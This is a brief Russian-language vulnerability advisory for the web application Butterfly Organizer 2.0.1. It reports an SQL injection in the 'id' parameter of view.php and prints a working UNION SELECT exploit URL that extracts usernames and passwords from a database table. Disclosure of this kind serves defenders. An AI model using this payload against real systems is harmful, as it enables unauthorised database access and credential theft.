Программа: Butterfly Organizer 2.0.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием view.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://localhost/[path]/view.php?id=-1+union+select+
0x49276d2076756c6e657261626c65203a28,2,3,name,url,username,
password,8,9,10+from+test_category&mytable=test_category